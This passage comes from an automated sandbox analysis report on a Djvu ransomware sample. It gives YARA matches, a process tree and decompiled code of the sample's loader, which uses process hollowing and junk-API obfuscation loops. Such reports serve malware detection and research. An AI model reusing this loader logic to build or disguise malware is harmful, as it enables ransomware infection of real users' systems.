                                                                                    MD5 hash:550B59B69EBFD6DDA6B55725245B46AD
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000D.00000001.345040542.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000D.00000001.345040542.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                    • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000D.00000002.348927479.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000D.00000002.348927479.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    Reputation:low

                                                                                    Chronological Activities

                                                                                    Analysis Process: NZPC0PFaC0.exe PID: 1308 Parent PID: 3352

                                                                                    General

                                                                                    Start time:12:30:15
                                                                                    Start date:04/10/2021
                                                                                    Path:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe' --AutoStart
                                                                                    Imagebase:0x400000
                                                                                    File size:833536 bytes
                                                                                    MD5 hash:550B59B69EBFD6DDA6B55725245B46AD
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000E.00000002.364511145.00000000008B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    Reputation:low

                                                                                    Chronological Activities

                                                                                    Analysis Process: NZPC0PFaC0.exe PID: 7044 Parent PID: 1308

                                                                                    General

                                                                                    Start time:12:30:23
                                                                                    Start date:04/10/2021
                                                                                    Path:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe' --AutoStart
                                                                                    Imagebase:0x400000
                                                                                    File size:833536 bytes
                                                                                    MD5 hash:550B59B69EBFD6DDA6B55725245B46AD
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000010.00000001.363770530.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000010.00000001.363770530.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                    • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000010.00000002.553605048.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000010.00000002.553605048.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    Reputation:low

                                                                                    Chronological Activities

                                                                                    Disassembly

                                                                                    Code Analysis

                                                                                    Reset < >

                                                                                      Analysis Process: NZPC0PFaC0.exe PID: 4332 Parent PID: 6136 NZPC0PFaC0.exeCOMMON

                                                                                      Executed Functions

                                                                                      Function 00840110, Relevance: 22.7, APIs: 15, Instructions: 248memorynativethreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 00840156
                                                                                      • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0084016C
                                                                                      • CreateProcessA.KERNELBASE(?,00000000), ref: 00840255
                                                                                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00840270
                                                                                      • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00840283
                                                                                      • GetThreadContext.KERNELBASE(00000000,?), ref: 0084029F
                                                                                      • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 008402C8
                                                                                      • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 008402E3
                                                                                      • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00840304
                                                                                      • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0084032A
                                                                                      • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 00840399
                                                                                      • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 008403BF
                                                                                      • SetThreadContext.KERNELBASE(00000000,?), ref: 008403E1
                                                                                      • ResumeThread.KERNELBASE(00000000), ref: 008403ED
                                                                                      • ExitProcess.KERNEL32(00000000), ref: 00840412
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Virtual$MemoryProcess$AllocThreadWrite$Context$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                                                                      • String ID:
                                                                                      • API String ID: 2875986403-0
                                                                                      • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                      • Instruction ID: f5f8de249a752b23cefbed054c34972100b3b01ad2f9152e341a78e3a24bcf60
                                                                                      • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                      • Instruction Fuzzy Hash: 9DB1C874A00208AFDB44CF98C895F9EBBB5FF88314F248158E609AB391D771AE41CF94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00840630, Relevance: 58.4, APIs: 1, Strings: 32, Instructions: 671libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNELBASE(user32), ref: 008406E2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID: CloseHandle$CreateFileA$CreateProcessA$CreateWindowExA$DefWindowProcA$ExitProcess$GetCommandLineA$GetFileAttributesA$GetMessageA$GetMessageExtraInfo$GetModuleFileNameA$GetStartupInfoA$GetThreadContext$MessageBoxA$NtUnmapViewOfSection$NtWriteVirtualMemory$PostMessageA$ReadProcessMemory$RegisterClassExA$ResumeThread$SetThreadContext$VirtualAlloc$VirtualAllocEx$VirtualFree$VirtualProtectEx$WaitForSingleObject$WinExec$WriteFile$WriteProcessMemory$kernel32$ntdll.dll$user32
                                                                                      • API String ID: 1029625771-3105132389
                                                                                      • Opcode ID: aab33881e6ea512dee0bea29e3953140485f8577d3db8e783070f8d433065c47
                                                                                      • Instruction ID: 0212bf60b5300e84f5dc61bcab4a023a4be99f6a185c8f90d2499f9673fa9875
                                                                                      • Opcode Fuzzy Hash: aab33881e6ea512dee0bea29e3953140485f8577d3db8e783070f8d433065c47
                                                                                      • Instruction Fuzzy Hash: 68A25460D0C6E8C9EB21C668CC4C7DDBEB51B26749F0841D9818C66292C7BB1B98CF76
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401AD1, Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 111memorylibrarystringCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 79%
                                                                                      			E00401AD1(void* __ebx, void* __edx, void* __ebp) {
				long _v4;
				void* __ecx;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t3;
				intOrPtr _t8;
				void* _t13;
				void* _t17;
				void* _t32;
				void* _t33;
				void* _t34;
				void* _t35;
				void* _t36;
				void* _t37;
				void* _t38;
				intOrPtr* _t41;

				_t33 = __edx;
				_t31 = __ebx;
				_t43 =  *0x4b8384 - 0x20a;
				if( *0x4b8384 == 0x20a) {
					ReleaseSemaphore(0, 0, 0);
					E00403C43(__ebx, _t33, _t34, 0);
					 *_t41 = 0x929;
					_push(0xea);
					E00403BB4(_t32, _t43);
					E00403F3E("0.txt", "rb");
					_push(0);
					E0040417A(__ebx, _t33, _t34, 0, _t43);
					_push(0);
					_push(0);
					_push(0);
					E00404272(_t31, _t33, _t34, 0, _t43);
				}
				E00401ABD();
				_t3 = GetModuleHandleA(0x4b03d8);
				 *0x4b6f88 = _t3;
				 *0x4b6f84 = GetProcAddress(_t3, "LocalAlloc");
				E00401AA9();
				VirtualProtect( *0x4b3d8c,  *0x4b8384, 0x40,  &_v4); // executed
				_t35 = 0;
				L3:
				L3:
				if(_t35 < 0x50956) {
					GetCurrentProcessId();
				}
				if(_t35 > 0x1ee94b8e) {
					goto L7;
				}
				_t35 = _t35 + 1;
				if(_t35 < 0x5c83a611) {
					goto L3;
				}
				L7:
				_t8 =  *0x4af1ec; // 0x362ff5
				 *0x4b8388 = _t8;
				E00401A6E(_t32);
				_t36 = 0;
				if( *0x4b8384 > 0) {
					do {
						if( *0x4b8384 == 0x44) {
							WriteConsoleW(0, 0, 0, 0, 0);
							GetCommandLineA();
						}
						_t36 = _t36 + 1;
					} while (_t36 <  *0x4b8384);
				}
				_t37 = 0;
				do {
					if( *0x4b8384 + _t37 == 0x5e) {
						GlobalDeleteAtom(0);
						HeapReAlloc(0, 0, 0, 0);
						GetFileAttributesA("beyayepimerucamirijajo wazonepilukohayuricetarizefaw zutujowizeba finomacuramuvuwojof gisakeli");
					}
					_t37 = _t37 + 1;
				} while (_t37 < 0x40c893);
				E0040199A();
				_t13 = 0;
				do {
					if(_t13 == 0x560e) {
						 *0x4b3d8c =  *0x4b3d8c;
					}
					_t13 = _t13 + 1;
				} while (_t13 < 0x89b2159a);
				_t38 = 0x7b;
				do {
					if( *0x4b8384 == 0x89) {
						RemoveDirectoryA("ojodobagulay");
						lstrlenW(L"Powu bekitahexozoman yoxefo");
						FlushFileBuffers(0);
					}
					_t38 = _t38 - 1;
				} while (_t38 != 0);
				_t17 =  *0x4b3d8c;
				 *0x4b6f8c = _t17;
				return  *_t17();
			}



















                                                                                      0x00401ad1
                                                                                      0x00401ad1
                                                                                      0x00401ad5
                                                                                      0x00401ae0
                                                                                      0x00401ae5
                                                                                      0x00401aec
                                                                                      0x00401af1
                                                                                      0x00401af8
                                                                                      0x00401afd
                                                                                      0x00401b0c
                                                                                      0x00401b11
                                                                                      0x00401b12
                                                                                      0x00401b17
                                                                                      0x00401b18
                                                                                      0x00401b19
                                                                                      0x00401b1a
                                                                                      0x00401b1f
                                                                                      0x00401b22
                                                                                      0x00401b2c
                                                                                      0x00401b38
                                                                                      0x00401b43
                                                                                      0x00401b48
                                                                                      0x00401b60
                                                                                      0x00401b66
                                                                                      0x00000000
                                                                                      0x00401b68
                                                                                      0x00401b6e
                                                                                      0x00401b70
                                                                                      0x00401b70
                                                                                      0x00401b7c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00401b7e
                                                                                      0x00401b85
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00401b87
                                                                                      0x00401b87
                                                                                      0x00401b8c
                                                                                      0x00401b91
                                                                                      0x00401b96
                                                                                      0x00401b9e
                                                                                      0x00401ba0
                                                                                      0x00401ba7
                                                                                      0x00401bae
                                                                                      0x00401bb4
                                                                                      0x00401bb4
                                                                                      0x00401bba
                                                                                      0x00401bbb
                                                                                      0x00401ba0
                                                                                      0x00401bc3
                                                                                      0x00401bc5
                                                                                      0x00401bcf
                                                                                      0x00401bd2
                                                                                      0x00401bdc
                                                                                      0x00401be7
                                                                                      0x00401be7
                                                                                      0x00401bed
                                                                                      0x00401bee
                                                                                      0x00401bf6
                                                                                      0x00401bfb
                                                                                      0x00401bfd
                                                                                      0x00401c02
                                                                                      0x00401c04
                                                                                      0x00401c04
                                                                                      0x00401c0e
                                                                                      0x00401c0f
                                                                                      0x00401c18
                                                                                      0x00401c19
                                                                                      0x00401c23
                                                                                      0x00401c2a
                                                                                      0x00401c35
                                                                                      0x00401c3c
                                                                                      0x00401c3c
                                                                                      0x00401c42
                                                                                      0x00401c42
                                                                                      0x00401c45
                                                                                      0x00401c4a
                                                                                      0x00401c54

                                                                                      APIs
                                                                                      • ReleaseSemaphore.KERNEL32(00000000,00000000,00000000,?,?,?,00401CD0), ref: 00401AE5
                                                                                      • _malloc.LIBCMT ref: 00401AEC
                                                                                        • Part of subcall function 00403C43: __FF_MSGBANNER.LIBCMT ref: 00403C66
                                                                                        • Part of subcall function 00403C43: __NMSG_WRITE.LIBCMT ref: 00403C6D
                                                                                        • Part of subcall function 00403C43: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,0040670A,00000001,00000001,00000001,?,00407543,00000018,004AB630,0000000C,004075D4), ref: 00403CBA
                                                                                      • _calloc.LIBCMT ref: 00401AFD
                                                                                        • Part of subcall function 00403BB4: __calloc_impl.LIBCMT ref: 00403BC9
                                                                                        • Part of subcall function 00403F3E: __fsopen.LIBCMT ref: 00403F4B
                                                                                      • _ftell.LIBCMT ref: 00401B12
                                                                                      • _fseek.LIBCMT ref: 00401B1A
                                                                                      • GetModuleHandleA.KERNEL32(004B03D8,?,?,?,00401CD0), ref: 00401B2C
                                                                                      • GetProcAddress.KERNEL32(00000000,LocalAlloc), ref: 00401B3D
                                                                                      • VirtualProtect.KERNELBASE(00000040,00401CD0,?,?,?,00401CD0), ref: 00401B60
                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,00401CD0), ref: 00401B70
                                                                                      • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,00401CD0), ref: 00401BAE
                                                                                      • GetCommandLineA.KERNEL32(?,?,?,00401CD0), ref: 00401BB4
                                                                                      • GlobalDeleteAtom.KERNEL32 ref: 00401BD2
                                                                                      • HeapReAlloc.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00401CD0), ref: 00401BDC
                                                                                      • GetFileAttributesA.KERNEL32(beyayepimerucamirijajo wazonepilukohayuricetarizefaw zutujowizeba finomacuramuvuwojof gisakeli,?,?,?,00401CD0), ref: 00401BE7
                                                                                      • RemoveDirectoryA.KERNEL32(ojodobagulay,?,?,?,00401CD0), ref: 00401C2A
                                                                                      • lstrlenW.KERNEL32(Powu bekitahexozoman yoxefo,?,?,?,00401CD0), ref: 00401C35
                                                                                      • FlushFileBuffers.KERNEL32(00000000,?,?,?,00401CD0), ref: 00401C3C
                                                                                      Strings
                                                                                      • LocalAlloc, xrefs: 00401B32
                                                                                      • ojodobagulay, xrefs: 00401C25
                                                                                      • Powu bekitahexozoman yoxefo, xrefs: 00401C30
                                                                                      • beyayepimerucamirijajo wazonepilukohayuricetarizefaw zutujowizeba finomacuramuvuwojof gisakeli, xrefs: 00401BE2
                                                                                      • 0.txt, xrefs: 00401B07
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: FileHeap$AddressAllocAllocateAtomAttributesBuffersCommandConsoleCurrentDeleteDirectoryFlushGlobalHandleLineModuleProcProcessProtectReleaseRemoveSemaphoreVirtualWrite__calloc_impl__fsopen_calloc_fseek_ftell_malloclstrlen
                                                                                      • String ID: 0.txt$LocalAlloc$Powu bekitahexozoman yoxefo$beyayepimerucamirijajo wazonepilukohayuricetarizefaw zutujowizeba finomacuramuvuwojof gisakeli$ojodobagulay
                                                                                      • API String ID: 1956735600-916741302
                                                                                      • Opcode ID: 363802e45cbc1e9938f1d9259d512af34c8340fabf9808789e9bdde61538a9e7
                                                                                      • Instruction ID: 64368fc77fc5fb3f68982e266deba3e8a23f621c9627160507ed0ea6518736cb
                                                                                      • Opcode Fuzzy Hash: 363802e45cbc1e9938f1d9259d512af34c8340fabf9808789e9bdde61538a9e7
                                                                                      • Instruction Fuzzy Hash: F631BC31649210ABD7216BA2EC49A5F3FA8FB57756B00003FF505A21F1DB3C5942DB6D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00840420, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 00840533
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateWindow
                                                                                      • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                                      • API String ID: 716092398-2341455598
                                                                                      • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                      • Instruction ID: 95aadb861234f5c93da3ae3891cbba4ad94096095da4063eb71f5f46e9fea03a
                                                                                      • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                      • Instruction Fuzzy Hash: DB511870D0838CDAEB11CBE8C849BDEBFB2AF15708F144058D5447F286C3BA5A58CB66
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 008405B0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetFileAttributesA.KERNELBASE(apfHQ), ref: 008405EC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID: apfHQ$o
                                                                                      • API String ID: 3188754299-2999369273
                                                                                      • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                      • Instruction ID: 960d3b2adbcd2fc861a1b3a4fba5e72a4b194e7621fa6257f60437c1381a9697
                                                                                      • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                      • Instruction Fuzzy Hash: 2C011A70C0424CEADB10DBE8C5183AEBFB5EF51309F148099C5496B242D7B69B98CBA2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040B13B, Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E0040B13B() {
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t1;
				void* _t5;
				void* _t18;
				WCHAR* _t20;

				_t1 = GetEnvironmentStringsW();
				_t20 = _t1;
				if(_t20 != 0) {
					if( *_t20 != 0) {
						goto L3;
						do {
							do {
								L3:
								_t1 =  &(_t1[1]);
							} while ( *_t1 != 0);
							_t1 =  &(_t1[1]);
						} while ( *_t1 != 0);
					}
					_t13 = _t1 - _t20 + 2;
					_t5 = E004066F9(_t1 - _t20 + 2); // executed
					_t18 = _t5;
					if(_t18 != 0) {
						E00406C90(_t13, _t18, _t20, _t18, _t20, _t13);
					}
					FreeEnvironmentStringsW(_t20);
					return _t18;
				} else {
					return 0;
				}
			}










                                                                                      0x0040b13e
                                                                                      0x0040b144
                                                                                      0x0040b14a
                                                                                      0x0040b153
                                                                                      0x00000000
                                                                                      0x0040b155
                                                                                      0x0040b155
                                                                                      0x0040b155
                                                                                      0x0040b156
                                                                                      0x0040b157
                                                                                      0x0040b15d
                                                                                      0x0040b15e
                                                                                      0x0040b155
                                                                                      0x0040b168
                                                                                      0x0040b16c
                                                                                      0x0040b171
                                                                                      0x0040b176
                                                                                      0x0040b188
                                                                                      0x0040b18d
                                                                                      0x0040b179
                                                                                      0x0040b184
                                                                                      0x0040b14c
                                                                                      0x0040b14f
                                                                                      0x0040b14f

                                                                                      APIs
                                                                                      • GetEnvironmentStringsW.KERNEL32(00000000,004045EF), ref: 0040B13E
                                                                                      • __malloc_crt.LIBCMT ref: 0040B16C
                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0040B179
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                      • String ID:
                                                                                      • API String ID: 237123855-0
                                                                                      • Opcode ID: e3af86716b64e7d49d5fc5e182e04f7ef26196038bc93161ff07307a014f1b80
                                                                                      • Instruction ID: ca23129a2f02d370f4ac4abbfd9ac60cbdd04e1e8a459185563b94de5e45c62a
                                                                                      • Opcode Fuzzy Hash: e3af86716b64e7d49d5fc5e182e04f7ef26196038bc93161ff07307a014f1b80
                                                                                      • Instruction Fuzzy Hash: B0F0E236608020AECB203A397C5C8771669DAD63A9312483BF893E7380F7384C4382ED
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040740D, Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E0040740D(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x4af848 = _t6;
				if(_t6 != 0) {
					 *0x4b94f4 = 1;
					return 1;
				} else {
					return _t6;
				}
			}




                                                                                      0x00407422
                                                                                      0x00407428
                                                                                      0x0040742f
                                                                                      0x00407436
                                                                                      0x0040743c
                                                                                      0x00407432
                                                                                      0x00407432
                                                                                      0x00407432

                                                                                      APIs
                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00407422
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: CreateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 10892065-0
                                                                                      • Opcode ID: eca62a75e17241b7887f2d816f82f642ed127b2d44714594b06c0855d4a465d0
                                                                                      • Instruction ID: 723b12508e055011cd5bc8d1319752aa9f0a4f64188f0caa3db623c13eea80a9
                                                                                      • Opcode Fuzzy Hash: eca62a75e17241b7887f2d816f82f642ed127b2d44714594b06c0855d4a465d0
                                                                                      • Instruction Fuzzy Hash: D9D0A7329583059FDB105FB0BC48B633FECD384395F108436B91CC6190F674D940D588
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00408A0C, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00408A0C() {
				void* _t1;

				_t1 = E0040899A(0); // executed
				return _t1;
			}




                                                                                      0x00408a0e
                                                                                      0x00408a14

                                                                                      APIs
                                                                                      • __encode_pointer.LIBCMT ref: 00408A0E
                                                                                        • Part of subcall function 0040899A: TlsGetValue.KERNEL32(00000000,?,00408A13,00000000,0040FCAD,004AF9D8,00000000,00000314,?,00408861,004AF9D8,Microsoft Visual C++ Runtime Library,00012010), ref: 004089AC
                                                                                        • Part of subcall function 0040899A: TlsGetValue.KERNEL32(00000001,?,00408A13,00000000,0040FCAD,004AF9D8,00000000,00000314,?,00408861,004AF9D8,Microsoft Visual C++ Runtime Library,00012010), ref: 004089C3
                                                                                        • Part of subcall function 0040899A: RtlEncodePointer.NTDLL(00000000,?,00408A13,00000000,0040FCAD,004AF9D8,00000000,00000314,?,00408861,004AF9D8,Microsoft Visual C++ Runtime Library,00012010), ref: 00408A01
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: Value$EncodePointer__encode_pointer
                                                                                      • String ID:
                                                                                      • API String ID: 2585649348-0
                                                                                      • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                      • Instruction ID: 4d8e19e985049fc054a2def13dc21817a3077e3b6309cd7b6af457893be6d37e
                                                                                      • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                      • Instruction Fuzzy Hash:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401AA9, Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00401AA9() {
				void* _t1;

				_t1 = GlobalAlloc(0,  *0x4b8384); // executed
				 *0x4b3d8c = _t1;
				return _t1;
			}




                                                                                      0x00401ab1
                                                                                      0x00401ab7
                                                                                      0x00401abc

                                                                                      APIs
                                                                                      • GlobalAlloc.KERNELBASE(00000000,00401B4D,?,?,?,00401CD0), ref: 00401AB1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: AllocGlobal
                                                                                      • String ID:
                                                                                      • API String ID: 3761449716-0
                                                                                      • Opcode ID: 72524da2900f049b8a321b9b16ef014963af8b60a72fdfe0f35524307ca8bb51
                                                                                      • Instruction ID: 754069fd4dd2cbc1cb21bf0d6498f86f96bdf3b8d3463e1c44aead12c4089d80
                                                                                      • Opcode Fuzzy Hash: 72524da2900f049b8a321b9b16ef014963af8b60a72fdfe0f35524307ca8bb51
                                                                                      • Instruction Fuzzy Hash: 72B01275508200CBCB800F51AC047003EB4A308713F00013DF704461F0CB310000EF08
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Non-executed Functions

                                                                                      Function 0040C762, Relevance: 66.4, APIs: 44, Instructions: 432COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E0040C762(signed int __eax, void* __esi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v20;
				signed int _t142;
				signed int _t145;
				signed int _t148;
				signed int _t151;
				signed int _t154;
				signed int _t157;
				signed int _t159;
				signed int _t162;
				signed int _t165;
				signed int _t168;
				signed int _t171;
				signed int _t174;
				signed int _t177;
				signed int _t180;
				signed int _t183;
